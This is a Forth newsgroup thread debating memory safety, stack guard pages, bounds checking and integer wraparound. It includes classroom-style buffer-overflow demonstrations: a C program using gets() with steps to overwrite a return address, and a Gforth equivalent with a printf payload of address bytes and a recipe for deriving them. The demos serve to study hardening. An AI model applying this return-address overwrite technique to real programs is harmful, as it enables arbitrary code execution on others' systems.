What if the program writes a float to a byte location?
Do we have to go along and make Forth type-safe then?
I'm wondering what the CS Forth users and Forth systems developers make
of the renewed recent push for use of memory-safe languages.
Certainly
Forth can add the type of contractual safety requirements e.g.,
implementing bounds checking, of a "memory-safe language". Do we need to
work on libraries for these provisions?
What if the program writes a float to a byte location?
Do we have to go along and make Forth type-safe then?
Forth by design is as unsafe as any assembler. The only way to tame it
is to run it in a black box.
Krishna Myneni <krishna.myneni@ccreweb.org> writes:
I'm wondering what the CS Forth users and Forth systems developers make
of the renewed recent push for use of memory-safe languages.
Which "renewed recent push" do you mean?
of the renewed recent push for use of memory-safe languages.Which "renewed recent push" do you mean?
anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
of the renewed recent push for use of memory-safe languages.Which "renewed recent push" do you mean?
https://www.tomshardware.com/software/security-software/white-house-urges-developers-to-avoid-c-and-c-use-memory-safe-programming-languages
https://www.whitehouse.gov/oncd/briefing-room/2024/02/26/press-release-technical-report/
I'm wondering what the CS Forth users and Forth systems developers make
of the renewed recent push for use of memory-safe languages. Certainly
Forth can add the type of contractual safety requirements e.g.,
implementing bounds checking, of a "memory-safe language". Do we need to
work on libraries for these provisions?
Opinions?
#include <stdio.h>
#include <stdlib.h>
void MaliciousCode() {
printf("This code is malicious!\n");
printf("It will not execute normally.\n");
exit(0);
}
void GetInput() {
char buffer[8];
gets(buffer);
// puts(buffer);
}
int main() {
GetInput();
return 0;
}
=== end code ===
It will be a useful exercise to work up a similar example in Forth, as a
step to thinking about automatic hardening techniques (as opposed to
input sanitization).
gcc xxx.c|xxx.c: In function ‘GetInput’:
I'm wondering what the CS Forth users and Forth systems developers make
of the renewed recent push for use of memory-safe languages. Certainly
Forth can add the type of contractual safety requirements e.g.,
implementing bounds checking, of a "memory-safe language". Do we need to
work on libraries for these provisions?
Opinions?
Krishna MyneniGroetjes Albert
On 2/03/2024 5:17 am, Paul Rubin wrote:
anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
of the renewed recent push for use of memory-safe languages.Which "renewed recent push" do you mean?
https://www.tomshardware.com/software/security-software/white-house-urges-developers-to-avoid-c-and-c-use-memory-safe-programming-languages
https://www.whitehouse.gov/oncd/briefing-room/2024/02/26/press-release-technical-report/
It's good to have an application that works as planned but how does one
that misbehaves translate to 'security risk' and how does 'memory-safe' >prevent that?
"ONCD has the belief that better metrics enable technology providers to
better plan, anticipate, and mitigate vulnerabilities before they become
a problem."
That may be their belief (fancy word for hope) but do they have anything
to back it up?
If you want an example, here's one that targets the Gforth version I
am currently working with:
: MaliciousCode ( -- )
." This code is malicious!" cr
." It will not execute normally." cr
bye ;
create buffer1 8 allot
:noname buffer1 96 stdin read-line . ; execute
bye
When I put this into a file xploit.fs and then perform
printf "01234567890123456789012345678901234567890123456789012345678901234567890123456789\x33\x5b\x57\x55\x55\x55\x00\x00\x68\xdc\xed\xe9\xff\x7f\x00\x00"|
setarch `uname -m` -R gforth xploit.fs
I get the following output:
This code is malicious!
It will not execute normally.
anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
If you want an example, here's one that targets the Gforth version I
am currently working with:
: MaliciousCode ( -- )
." This code is malicious!" cr
." It will not execute normally." cr
bye ;
create buffer1 8 allot
:noname buffer1 96 stdin read-line . ; execute
bye
When I put this into a file xploit.fs and then perform
printf "01234567890123456789012345678901234567890123456789012345678901234567890123456789\x33\x5b\x57\x55\x55\x55\x00\x00\x68\xdc\xed\xe9\xff\x7f\x00\x00"|
setarch `uname -m` -R gforth xploit.fs
I get the following output:
This code is malicious!
It will not execute normally.
I forgot to give a recipe for the printf above:
insert
' call -2 cells + 8 dump ' MaliciousCode sp@ 8 dump drop
right before the execute, and the dumps contain the bytes you have to
put into the printf after the 80th byte, in that order. I.e.:
: MaliciousCode ( -- )
." This code is malicious!" cr
." It will not execute normally." cr
bye ;
create buffer1 8 allot
:noname buffer1 96 stdin read-line . ;
' call -2 cells + 8 dump ' MaliciousCode sp@ 8 dump drop
execute
bye
and run it with
echo|setarch `uname -m` -R gforth xploit.fs gforth xploit.fs
For the particular Gforth at hand, this produces:
7FFFE9E43160: 33 5B 57 55 55 55 00 00 - 3[WUUU..
7FFFE9AF6FF0: 68 DC ED E9 FF 7F 00 00 - h.......
exactly the bytes in the printf above.
On 3/1/24 09:54, Krishna Myneni wrote:
I'm wondering what the CS Forth users and Forth systems developers
make of the renewed recent push for use of memory-safe languages.
Certainly Forth can add the type of contractual safety requirements
e.g., implementing bounds checking, of a "memory-safe language". Do we
need to work on libraries for these provisions?
Opinions?
I played with a simple buffer overflow attack code in C, based on an
example I found at
https://www.jsums.edu/nmeghanathan/files/2015/05/CSC437-Fall2013-Module-5-Buffer-Overflow-Attacks.pdf
=== begin code ===
/*
Demonstrate buffer overflow exploit.
Adapted from the example at:
https://www.jsums.edu/nmeghanathan/files/2015/05/CSC437-Fall2013-Module-5-Buffer-Overflow-Attacks.pdf
Build with:
gcc -m32 -o exploit_demo exploit_demo.c
Normal run:
printf "abcdefg" | ./exploit_demo
Find the address of MaliciousCode() within the disassembled executable
objdump -S ./exploit_demo
from the listing above, note the 4-byte address of MaliciousCode
and put the address in the input string, from low-byte to high-byte.
Exploit Example: pass a string to overflow the buffer and run
exploit code
printf "abcdefghijklmnopqrst\x96\x91\x04\x08" | ./exploit_demo
replace the address 0x08049186 above with the one you obtained
from objdump command.
The exploit will cause MaliciousCode() to execute.
*/
#include <stdio.h>
#include <stdlib.h>
void MaliciousCode() {
printf("This code is malicious!\n");
printf("It will not execute normally.\n");
exit(0);
}
void GetInput() {
char buffer[8];
gets(buffer);
// puts(buffer);
}
int main() {
GetInput();
return 0;
}
=== end code ===
It will be a useful exercise to work up a similar example in Forth, as a
step to thinking about automatic hardening techniques (as opposed to
input sanitization).
--
Krishna
On 2/03/2024 5:17 am, Paul Rubin wrote:
anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
of the renewed recent push for use of memory-safe languages.Which "renewed recent push" do you mean?
https://www.tomshardware.com/software/security-software/white-house-urges-developers-to-avoid-c-and-c-use-memory-safe-programming-languages
https://www.whitehouse.gov/oncd/briefing-room/2024/02/26/press-release-technical-report/
It's good to have an application that works as planned but how does one
that misbehaves translate to 'security risk' and how does 'memory-safe' prevent that?
Harden these without runtime checks:
: RT1 2 3e recurse ;
: RT2 drop fdrop recurse ;
=== end example ===rt1<<<
Harden these without runtime checks:
: RT1 2 3e recurse ;
: RT2 drop fdrop recurse ;
rt2rt1<<<
rt2<<<
On 3/2/24 10:08, Krishna Myneni wrote:
=== Gforth example ===
: rt1 recurse ; ok
rt1
*the terminal*:2:1: error: Return stack overflow
=== end example ===rt1<<<
To be clear, if you try to fill up the fp or data stack, as with your
rt1 example, kForth does give a segfault (and hence is susceptible to an >exploit), while Gforth still gives the same error.
On 3/2/24 09:39, minforth wrote:
Harden these without runtime checks:
: RT1 2 3e recurse ;
: RT2 drop fdrop recurse ;
Let's see what python does:
def rt1():
return rt1()
rt1()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "<stdin>", line 2, in rt1
File "<stdin>", line 2, in rt1
File "<stdin>", line 2, in rt1
[Previous line repeated 996 more times]
RecursionError: maximum recursion depth exceeded
Clearly it is doing a runtime check. Similarly one could have RECURSE in Forth perform a runtime check to enforce a recursion depth limit, and
indeed this type of error is caught by several Forth systems:
=== kForth example ===
: rt1 recurse ;
ok
rt1
Line 2: VM Error(-258): Return stack corrupt
rt1
=== end example ===
=== Gforth example ===
: rt1 recurse ; ok
rt1
*the terminal*:2:1: error: Return stack overflow
=== end example ===rt1<<<
Krishna Myneni <krishna.myneni@ccreweb.org> writes:
On 3/2/24 10:08, Krishna Myneni wrote:
=== Gforth example ===
: rt1 recurse ; ok
rt1
*the terminal*:2:1: error: Return stack overflow
>>>rt1<<<
=== end example ===
To be clear, if you try to fill up the fp or data stack, as with your
rt1 example, kForth does give a segfault (and hence is susceptible to an
exploit), while Gforth still gives the same error.
In Gforth on a Unix system, Unix produces a SIGSEGV when a stack runs
into a guard page. The signal handler then looks at the offending
address, and guesses that an access close to the bottom of a stack is
an underflow of that stack, and correspondingly for accesses close to
the top of a stack. This can be seen as follows:
With the gforth engine with the FP stack being empty:
fp@ 32769 - c@
*the terminal*:3:13: error: Floating-point stack overflow
fp@ 32769 - >>>c@<<<
fp@ 1+ c@
*the terminal*:4:8: error: Floating-point stack underflow
fp@ 1+ >>>c@<<<
It's good to have an application that works as planned but how does one
that misbehaves translate to 'security risk'
and how does 'memory-safe' prevent that?
That may be their belief (fancy word for hope) but do they have anything
to back it up?
Does this mean Gforth is
immune to arbitrary code execution attacks for the fp and data stack
overflow and underflow conditions?
In Forth, you have to create asserts yourself.
It's unclear what they mean, but it's certainly the case that studying
the historical corpus of CVE's tells us things about common types of
attacks. That tells us what areas need attention.
What I've found in practice is that there is almost no
slowdown. I suspect that the memory access itself is slower than the
range check, even when it usually is within the cpu cache.
Krishna Myneni <krishna.myneni@ccreweb.org> writes:
On 3/2/24 10:08, Krishna Myneni wrote:
=== Gforth example ===
: rt1 recurse ; ok
rt1
*the terminal*:2:1: error: Return stack overflow
>>>rt1<<<
=== end example ===
To be clear, if you try to fill up the fp or data stack, as with your
rt1 example, kForth does give a segfault (and hence is susceptible to an
exploit), while Gforth still gives the same error.
In Gforth on a Unix system, Unix produces a SIGSEGV when a stack runs
into a guard page. The signal handler then looks at the offending
address, and guesses that an access close to the bottom of a stack is
an underflow of that stack, and correspondingly for accesses close to
the top of a stack. This can be seen as follows:
With the gforth engine with the FP stack being empty:
fp@ 32769 - c@
*the terminal*:3:13: error: Floating-point stack overflow
fp@ 32769 - >>>c@<<<
fp@ 1+ c@
*the terminal*:4:8: error: Floating-point stack underflow
fp@ 1+ >>>c@<<<
I'm wondering what the CS Forth users and Forth systems developers make
of the renewed recent push for use of memory-safe languages. Certainly
Forth can add the type of contractual safety requirements e.g.,
implementing bounds checking, of a "memory-safe language". Do we need to
work on libraries for these provisions?
Opinions?
--
Krishna Myneni
On 3/2/24 10:43, Anton Ertl wrote:
With the gforth engine with the FP stack being empty:
fp@ 32769 - c@
*the terminal*:3:13: error: Floating-point stack overflow
fp@ 32769 - >>>c@<<<
fp@ 1+ c@
*the terminal*:4:8: error: Floating-point stack underflow
fp@ 1+ >>>c@<<<
In the version of Gforth which I have (0.7.9_20220120),
fp@ 32769 - c@
*the terminal*:5:13: error: Floating-point stack overflow
fp@ 32769 - >>>c@<<<
However,
fp@ 65536 - c@ ok 1
and, worse,
1 fp@ 65536 - c! ok
So the guard pages are not a solution to pointer arithmetic bugs with
the stack pointers.
To make stack access memory safe, there has to be bounds checks on
reading and writing from/to stacks. This suggests that stacks should be >arrays and stack operations always involve array read/write from arrays
with enforced bounds checking e.g. something like
: DUP STACK[ tos ]@ ; \ TOS returns an index to the top of the stack
: OVER STACK[ tos 1+ ]@ ;
etc. and ]@ and ]! performs bounds checks.
You can compile in DEBUG/RELEASE mode, whereby runtime checks
are no longer included in RELEASE mode. But these are quasi
pre-mortem traps, just like guard pages - they do not make Forth
safer as a language, for that it would need a-priori error traps.
An example:
: TE1 -1 dup c! ;
TE1 contains two errors: -1 is not a char and -1 is not a permitted
memory address. It must be possible to catch these during compilation.
You can run around in circles here, the basic problem is that there is
no formal specification for what a safe programming language is.
Analyses on the subject are dominated by the following: Memory errors,
type errors, range errors, race condition errors.
In order to develop Forth more in this direction, we would first need
a specification on "Hardened Forth" that is dedicated to these error
areas - and also marks UBs with defined exception codes. Ideally
accompanied by a test suite so that every Forth system developer can
check their own system.
Krishna Myneni <krishna.myneni@ccreweb.org> writes:
On 3/2/24 10:43, Anton Ertl wrote:
With the gforth engine with the FP stack being empty:
fp@ 32769 - c@
*the terminal*:3:13: error: Floating-point stack overflow
fp@ 32769 - >>>c@<<<
fp@ 1+ c@
*the terminal*:4:8: error: Floating-point stack underflow
fp@ 1+ >>>c@<<<
In the version of Gforth which I have (0.7.9_20220120),
fp@ 32769 - c@
*the terminal*:5:13: error: Floating-point stack overflow
fp@ 32769 - >>>c@<<<
However,
fp@ 65536 - c@ ok 1
and, worse,
1 fp@ 65536 - c! ok
So the guard pages are not a solution to pointer arithmetic bugs with
the stack pointers.
Yes, that is not their intention and not the intention of these
examples. The intention of these examples is to show that any memory
access will be interpreted as a stack underflow or overflow if it is
to a certain range of addresses.
A more serious issue is that, as implemented in Gforth (in particular, gforth-fast), stack underflows can be undetected in some cases: On
Gforth on an AMD64 system, with the data stack being empty:
600 pick ok 1
On gforth-fast, with the data stack being empty:
: foo 600 0 ?do nip loop cr . ; foo
0
*the terminal*:1:33: error: Stack underflow
: foo 600 0 ?do nip loop cr . ; >>>foo<<<
Backtrace:
kernel/basics.fs:312:27: 0 $7F30E3BDFE10 throw
Note that FOO actually performs the "cr .", so the stack underflow is
not detected by an access to the the guard page. Instead, the text interpreter checks the stack pointer and reports a stack underflow.
The non-detection of the stack underflow is because NIP is implemented
as:
$7F30E3C72C90 nip 1->1
7F30E3917557: add r13,$08 #update sp
With the gforth engine, a similar scenario (involving DROP) is avoided because in this engine DROP loads the value being dropped exactly to
trigger stack underflow reports where they happen:
$7F55EBFA6C98 drop 0->0
7F55EBAC51C0: mov $50[r13],r15 #save ip (for accurate backtraces) 7F55EBAC51C4: add r15,$08 #update ip
7F55EBAC51C8: mov rax,[r14] #load dropped value
7F55EBAC51CB: add r14,$08 #update sp
Neither the deep PICK nor the loop that just NIPs or DROPs occur in
practice.
The motivation for the otherwise unnecessary load in DROP (in gforth)
is code sequences like
drop 1
in cases where the stack is empty. The load in DROP results in
detecting the stack underflow at the DROP rather than at the "1".
Reporting a stack underflow at an operation that just pushes can
produce a WTF moment in the programmer; the gforth engine exists to
make debugging easier, and that includes avoiding such moments.
To make stack access memory safe, there has to be bounds checks on
reading and writing from/to stacks. This suggests that stacks should be
arrays and stack operations always involve array read/write from arrays
with enforced bounds checking e.g. something like
: DUP STACK[ tos ]@ ; \ TOS returns an index to the top of the stack
: OVER STACK[ tos 1+ ]@ ;
etc. and ]@ and ]! performs bounds checks.
With guard pages, that's not necessary. The normal bounded-depth
stack accesses (of words like 2DROP or 2OVER) are sure to hit the
guard pages if the stack is out-of-bounds; you may want to perform an otherwise unnecessary load on words like NIP, DROP, 2DROP etc. that do
not otherwise use (and thus load) the stack values that they consume,
but that's much cheaper than putting bounds checks on every stack
access. For unbounded stack-access words like PICK, a bounds check is appropriate.
The intent of the stack array access was to avoid stack pointer
arithmetic altogether. Stack array access words provide a safe alternate
to doing stack pointer arithmetic in Forth code. Pointer arithmetic
appears to be the source of a lot of memory safety problems.
You can run around in circles here, the basic problem is that there is
no formal specification for what a safe programming language is.
Analyses on the subject are dominated by the following: Memory errors,
type errors, range errors, race condition errors.
In order to develop Forth more in this direction, we would first need
a specification on "Hardened Forth" that is dedicated to these error
areas - and also marks UBs with defined exception codes.
You can run around in circles here, the basic problem is that there is
no formal specification for what a safe programming language is.
They put out for proposals for a new language to be designed. The
eventual winner was Ada, but that choice came with some controversy at
the time. There were competing proposals that some people felt were
less bloated and still fulfilled the intended goals.
Misra-C is an example. There is no language specification, but quite a
number of rules against which a C program can be checked.
That's patchwork, but if it is sufficient for a program,
good for the program. As for language safety....
OTOH I doubt that there is any demand for a paranoia Forth
with safety belts and suspenders and alarm whistles.
On 3/03/2024 4:54 pm, Ron AARON wrote:
One of the criteria for 8th was security -- among other things, making it very difficult to do unsafe memory operations.
Has it paid off - by which I mean completed apps that out of the blue access invalid memory? I'm curious as to what exactly is behind the high rate of 'memory errors' that govt et al is reporting because in my limited experience programming in Forth, I'm just not seeing any. I wonder if it has something to do with the practices employed in those other languages - such as the use of third-party libraries which programmers use essentially on faith.
On 3/3/24 10:08, minforth wrote:
OTOH I doubt that there is any demand for a paranoia Forth
with safety belts and suspenders and alarm whistles.
Perhaps not, but I wrote my Forth system to provide some hand-holding, primarily for my own needs. My expectation is that the demand for Forth systems which don't address safety concerns will rapidly drop to zero.
While I, personally, rarely write code that has those sorts of issues
(at least, not in 30 years), I have worked in places where they were
fairly common. It depends a lot on the expertise and attention to detail
of the programmers, I think.
Ron AARON wrote:
While I, personally, rarely write code that has those sorts of issues
(at least, not in 30 years), I have worked in places where they were
fairly common. It depends a lot on the expertise and attention to
detail of the programmers, I think.
I think it's also a question of the scale of the software. Forth programs
are usually microscopically small and manageable. Typical modern software
can reach gigabytes and must be created by a team of developers who
sometimes
don't even work in the same place. The attack surface for errors is
therefore
orders of magnitude larger. Then there is a need for many more a-priori security functions already in the programming language and development
tools,
followed by software engineering test procedures.
Has it paid off - by which I mean completed apps that out of the blue access >invalid memory?
I'm curious as to what exactly is behind the high rate of
'memory errors' that govt et al is reporting because in my limited experience >programming in Forth, I'm just not seeing any.
What do I use while developing a recursive function: ?STACK.
: TEST drop depth ; okdrop<<< depth
Krishna Myneni wrote:
On 3/3/24 10:08, minforth wrote:
OTOH I doubt that there is any demand for a paranoia Forth
with safety belts and suspenders and alarm whistles.
Perhaps not, but I wrote my Forth system to provide some hand-holding,
primarily for my own needs. My expectation is that the demand for
Forth systems which don't address safety concerns will rapidly drop to
zero.
IIRC there have been a few Forth applications at NASA and for astronomy
(e.g. see Forth Inc. web site). I've already wondered how much convincing
had to be done for NASA not to disqualify Forth.
On 3/4/24 01:52, minforth wrote:
Krishna Myneni wrote:
On 3/3/24 10:08, minforth wrote:
OTOH I doubt that there is any demand for a paranoia Forth
with safety belts and suspenders and alarm whistles.
Perhaps not, but I wrote my Forth system to provide some hand-holding,
primarily for my own needs. My expectation is that the demand for
Forth systems which don't address safety concerns will rapidly drop to
zero.
IIRC there have been a few Forth applications at NASA and for astronomy
(e.g. see Forth Inc. web site). I've already wondered how much convincing
had to be done for NASA not to disqualify Forth.
The trend has been to go to "memory-safe" languages. There are many
instances in which simple run-time type checking for addresses have
resulted in saving me considerable debugging time -- usually just stack
order is incorrect, but the error can manifest in more complex ways as well.
I don't have any particular insight into the trends other than following
the news. I think there will be even greater pressure going forward to
use memory-safe languages for internet facing applications. The shift in academia towards those languages appears to have already happened.
Has it paid off - by which I mean completed apps that out of the blue
access invalid memory?
I'm curious as to what exactly is behind the high rate of 'memory
errors' that govt et al is reporting because in my limited experience programming in Forth, I'm just not seeing any.
IIRC there have been a few Forth applications at NASA and for astronomy
(e.g. see Forth Inc. web site).
mhx@iae.nl (mhx) writes:
What if the program writes a float to a byte location?
That's not a safety problem (as long as the location is big enough for
the float), so one can design a Safe Forth variant that allows that.
Yes but asking the system to find errors isn't looking - it's covering
one's butt.
Tristan Wibberley <tristan.wibberley+netnews2@alumni.manchester.ac.uk> writes:
If so, plenty of computers have alignment
requirements,
In general-purpose computers, that used to be the case in the 1990s,
but nowadays it is no longer the case. We have to use really old
hardware to test against alignment errors. ...
mhx@iae.nl (mhx) writes:
What if the program writes a float to a byte location?
That's not a safety problem (as long as the location is big enough for
the float), so one can design a Safe Forth variant that allows that.
I'm not very familiar with forth yet, does this refer to writing to a
machine addressed location?
If so, plenty of computers have alignment
requirements,
a DoS can be introduced by the above action.
Also, if you write a byte to a float location, a variety of problems can
be introduced including running trap callbacks that were insufficiently >tested for the new program state, etc, killing the process and running >restart sequences where less volatile state can now be in an unusual >condition and new side-effects induced, and so on.
memory safety means maintaining invariant relations wrt. each memory >location.
On 05/03/2024 06:35, Anton Ertl wrote:
Tristan Wibberley <tristan.wibberley+netnews2@alumni.manchester.ac.uk> writes:
....
If so, plenty of computers have alignment
requirements,
In general-purpose computers, that used to be the case in the 1990s,
but nowadays it is no longer the case. We have to use really old
hardware to test against alignment errors. ...
Or special purpose computers that are not mass marketed, but I wasn't
aware they'd fixed all the public market computers. Thanks for the info.
AFAIK hacks are opportunistic i.e. could not reasonably be foreseen.
Such "errors" are forgivable. Not so, programmers who either don't
know where something might overflow, or knowing, fail to address it.
If you think you will revive Forth by jumping on that Rust bandwagon,
I think you're wrong.
First and foremost, because I think Rust is the wrong idea. It's been
tried before - Ada, Pascal, Java - in some sense: BASIC.
Good programmers exist because they are good programmers. Bad programs
exist because of bad programmers.
"Ada will not meet its major objective... for it is so complicated
that it defies the unambiguous definition that is essential for these purposes.
"...for it is so complicated...". That is the very definition of Rust.
All the time you're spending getting your code to compile, you're not creating programs.
I'd say that's the reverse of productivity. The higher the
abstraction, the more difficult it is to understand - let alone to
teach.
Lifetimes? Borrowing? Are you kidding me?
So, safety, yes. I like that very much. I ventured into that very
early and I never regretted it. But apart from some basic checks it
should stop at the point where I have to convince a compiler that I
know what I'm doing.
I tend to trust my Forth programs a lot more than my C ones
At no time during its writing did I consider hackers or inept users. Responsible programming was all.
On 6/03/2024 11:54 am, Paul Rubin wrote:
...
Those of us who have to
program in the 21st century, though, need all the help we can get.
"There is no hardware protection. Memory protection can be provided by
the access computer. But I prefer software that is correct by design." - C.M.
On 6/03/2024 7:23 pm, minforth wrote:
dxf wrote:
On 6/03/2024 11:54 am, Paul Rubin wrote:
... Those of us who have to
program in the 21st century, though, need all the help we can get.
"There is no hardware protection. Memory protection can be provided by
the access computer. But I prefer software that is correct by design." - C.M.
Conficious said:
Use program that treats integer wraparound as good feature and find yourself in big heap of dung
A 'memory-safe' system won't detect that. What now?
For example it's my experience one can input an out-of-range integer
into C and Forth compilers and neither will notice.... Programmers
too and I'm no exception.
dxf <dxforth@gmail.com> writes:
For example it's my experience one can input an out-of-range integer
into C and Forth compilers and neither will notice.... Programmers
too and I'm no exception.
These days I'd call C and Forth both niche languages, the niche being
low level systems code and small embedded programs. #1 on TIOBE is
Python, which uses arbitrary precision as the native integer type. That slows arithmetic down but it mostly eliminates the overflow problem.
IMHO that is what all high level languages should do by default. Of
course native machine types and low level languages (C, Forth, Rust,
Ada, etc.) should stay available for cases where you want to or have to program closer to the hardware.
#1 on TIOBE is
Python, which uses arbitrary precision as the native integer type. That >slows arithmetic down but it mostly eliminates the overflow problem.
Years ago we had a crash with using old archived data files
in a more recent system. The old file format relied on having
max 64k (16bit) index size, while the evaluating system assumed
24bit, and so the index overflowed the allocated memory space.
On Sat, 09 Mar 2024 11:30:56 GMT
anton@mips.complang.tuwien.ac.at (Anton Ertl) wrote:
If implemented well, the slowdown is small in the common case (small
integers): E.g., on AMD64 an add, sub, or imul instruction just needs
to be followed by a jo which in the usual case is not taken and very
predictable.
Don't you also need to first check that both arguments are small
integers ?
If implemented well, the slowdown is small in the common case (small integers): E.g., on AMD64 an add, sub, or imul instruction just needs
to be followed by a jo which in the usual case is not taken and very predictable.
Python (particularly CPython), however, does not seem to have gone for efficient implementation;
I don't know what they do for arbitrarily large integers, but the
inner interpreter was pretty monstrous last I looked.
But integer overflow is orthogonal to memory safety.
There are many people who claim that wrapping behaviour for integer
overflow is a problem.
Java defines the basic types int and long to perform wraparound on
overflow,
anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
If implemented well, the slowdown is small in the common case (small
integers): E.g., on AMD64 an add, sub, or imul instruction just needs
to be followed by a jo which in the usual case is not taken and very
predictable.
It might be worse for RISC V.
I don't know what they do for arbitrarily large integers, but the
inner interpreter was pretty monstrous last I looked.
CPython has a fairly straightforward bytecode interpreter.
But integer overflow is orthogonal to memory safety.
There are many people who claim that wrapping behaviour for integer
overflow is a problem.
It has a problem because it's wrong! Of course it's deterministic
instead of being UB, and that makes some people feel better, but making
2+2=5 is also deterministic yet wrong.
Imagine x is a 50 element array and for whatever reason you try to
update x[60].
So the implementation might clobber 10 elements past the
end of the array (bad), or it can signal an error (the only thing that
makes sense), or in a feat of Java-like brilliance it might alias x[60]
to x[10] since 60 is 10 mod 50.
Java defines the basic types int and long to perform wraparound on
overflow,
Yes, a mistake IMHO.
2+2=5 is also deterministic yet wrong.In Java 2+2 gives 4. What do you hope to gain by putting up straw men?
You just have no arguments but "It's wrong!" and straw men to back up
your opinion.
Any number representation has its problems - since there is no way to properly represent infinite precision.
Exclamations like "BUT IT'S WRONG" may be correct, but without a true alternative it's not gonna change much.
It depends a lot on how error checking is handled. You could return it
like "errno" or perror(). You could throw an exception. You could
return some special value - like a NULL pointer.
std::ofstream file("example.txt");
if (!file.is_open()) {
I mean, NULL is already a macro, it shouldn't be difficult to
gravitate to a better value.
Paul Rubin <no.email@nospam.invalid> writes: >>anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
If implemented well, the slowdown is small in the common case (small
integers): E.g., on AMD64 an add, sub, or imul instruction just needs
to be followed by a jo which in the usual case is not taken and very
predictable.
It might be worse for RISC V.
It is. That's a failure of RISC-V.
In article <2024Mar10.092913@mips.complang.tuwien.ac.at>,
Anton Ertl <anton@mips.complang.tuwien.ac.at> wrote:
Paul Rubin <no.email@nospam.invalid> writes: >>>anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
If implemented well, the slowdown is small in the common case (small
integers): E.g., on AMD64 an add, sub, or imul instruction just needs
to be followed by a jo which in the usual case is not taken and very
predictable.
It might be worse for RISC V.
It is. That's a failure of RISC-V.
As far as I can tell it was a design choice for DEC Alpha and RISC-V.
Apparently flags are detrimental to parallelism.
You can't call that a failure because you don't like it.
You will need >6 parallel multi-precision additions before the two
carry flags of AMD64 with ADX are theoretically more limiting than the >MIPS/Alpha/RISC-V approach. And to be practically more limiting, the
RISC-V implementation needs to be extremely wide (>36 instructions per
cycle) and the precision must be extremely high (to eliminate overlap
between chains as an issue).
No / not yet?
"The requested URL /anton/tmp/opt-ipc-uarch.eps : was not found on this server."
anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
2+2=5 is also deterministic yet wrong.In Java 2+2 gives 4. What do you hope to gain by putting up straw men?
2+2=5 is obviously wrong and Java doesn't go quite that far. Java
instead insists that you can add two positive integers and get a
negative one. That's wrong the same way that 2+2=5 is.
It just doesn't
mess up actual programs as often, because the numbers involved are
bigger.
In what world can it be right for n to be a positive integer and n+1 to
be a negative integer? That's not how integers work.
Tony Hoare in 2009 said about null pointers:
Java-style wraparound
arithmetic is more of the same. A bug magnet,
Java also has null pointers, another possible mistake. Ada doesn't have >them,
C++ has them because of its C heritage and
the need to support legacy code, but I believe that in "modern" C++
style you're supposed to use references instead of pointers, so you
can't have a null or uninitialized one.
wget http://www.complang.tuwien.ac.at/anton/tmp/opt-ipc-uarch.eps
Not at all. Modular arithmetic is not arithmetic in Z, but it's a commutative ring and has the nice properties of this algebraic
structure.
but even that works surprisingly well, so well that the RISC-V
designers have not seen a need to include an efficient way to detect
those cases where the result deviates from that in Z.
Still, the nice algebraic properties of modular arithmetic can be of
benefit even in such cases.... 64 bit machine
In what world can it be right for n to be a positive integer and n+1 toIt's how Java's int and long types work.
be a negative integer? That's not how integers work.
And if you want something closer to Z, Java also has BigInteger.
Tony Hoare in 2009 said about null pointers:And the relevance is?
Java-style wraparound arithmetic is more of the same. A bug magnet,Unsupported claim.
I think I saw the unintended result on a 32-bit machine
I don't know much about C++, but I would be surprised if they had
given up on uninitialized data. And an uninitialized reference is
certainly not better than a null reference.
The fact that Java idiomatics is to implement trees and linked lists
not in the object-oriented way I outlined above
Paul Rubin <no.email@nospam.invalid> writes:<SNIP?
Java also has null pointers, another possible mistake. Ada doesn't have >>them,
Ada certainly has null.
C++ has them because of its C heritage and
the need to support legacy code, but I believe that in "modern" C++
style you're supposed to use references instead of pointers, so you
can't have a null or uninitialized one.
I don't know much about C++, but I would be surprised if they had
given up on uninitialized data. And an uninitialized reference is
certainly not better than a null reference.
- anton
Krishna Myneni <krishna.myneni@ccreweb.org> writes:
#include <stdio.h>
#include <stdlib.h>
void MaliciousCode() {
printf("This code is malicious!\n");
printf("It will not execute normally.\n");
exit(0);
}
void GetInput() {
char buffer[8];
gets(buffer);
// puts(buffer);
}
int main() {
GetInput();
return 0;
}
=== end code ===
It will be a useful exercise to work up a similar example in Forth, as a >>step to thinking about automatic hardening techniques (as opposed to
input sanitization).
Forth does not have an inherently unbounded input word like C's
gets(). And even typical C environments warn you when you compile
this code; e.g., when I compile it on Debian 11, I get:
gcc xxx.c|xxx.c: In function ‘GetInput’:
|xxx.c:12:10: warning: implicit declaration of function ‘gets’; did
you mean ‘fgets’? [-Wimplicit-function-declaration]
| 12 | gets(buffer);
| | ^~~~
| | fgets
|/usr/bin/ld: /tmp/ccC9Qbu7.o: in function `GetInput':
|xxx.c:(.text+0x3b): warning: the `gets' function is dangerous and
should not be used.
So, they removed gets() from stdio.h, and added a warning to the
linker. "man gets" tells me:
|_Never use this function_
|[...]
|ISO C11 removes the specification of gets() from the C language, and
|since version 2.16, glibc header files don't expose the function >|declaration if the _ISOC11_SOURCE feature test macro is defined.
- anton
In a perfect world I'd have a word:
- That puts *three* parameters on the stack: limit, start and step;
- That evaluates these three parameters and leaves a flag
- That takes this flag and skips the loop if zero.
Let's call the word that initializes these actions "+DO". +DO equals (
limit index step -- R: limit index step)
Compare: https://rosettacode.org/wiki/Loops/Wrong_ranges#uBasic/4tH
To the rather weak: https://rosettacode.org/wiki/Loops/Wrong_ranges#Forth
Note that 4tH behaves different here. It catches most of the exceptional >situations:
start: -2 stop: 2 inc: 1 | -2 -1 0 1
start: -2 stop: 2 inc: 0 | -2
start: -2 stop: 2 inc: -1 | -2
start: -2 stop: 2 inc: 10 | -2
start: 2 stop: -2 inc: 1 | 2
start: 2 stop: 2 inc: 1 | 2
start: 2 stop: 2 inc: -1 | 2
start: 2 stop: 2 inc: 0 | 2
start: 0 stop: 0 inc: 0 | 0
Versus:
Some of these loop infinitely, and some under/overflow, so for the sake
of brevity long outputs will be truncated by ....
start: -2 stop: 2 inc: 1 | -2 -1 0 1
start: -2 stop: 2 inc: 0 | -2 -2 -2 -2 -2 ...
start: -2 stop: 2 inc: -1 | -2 -3 -4 -5 ... 5 4 3 2
start: -2 stop: 2 inc: 10 | -2
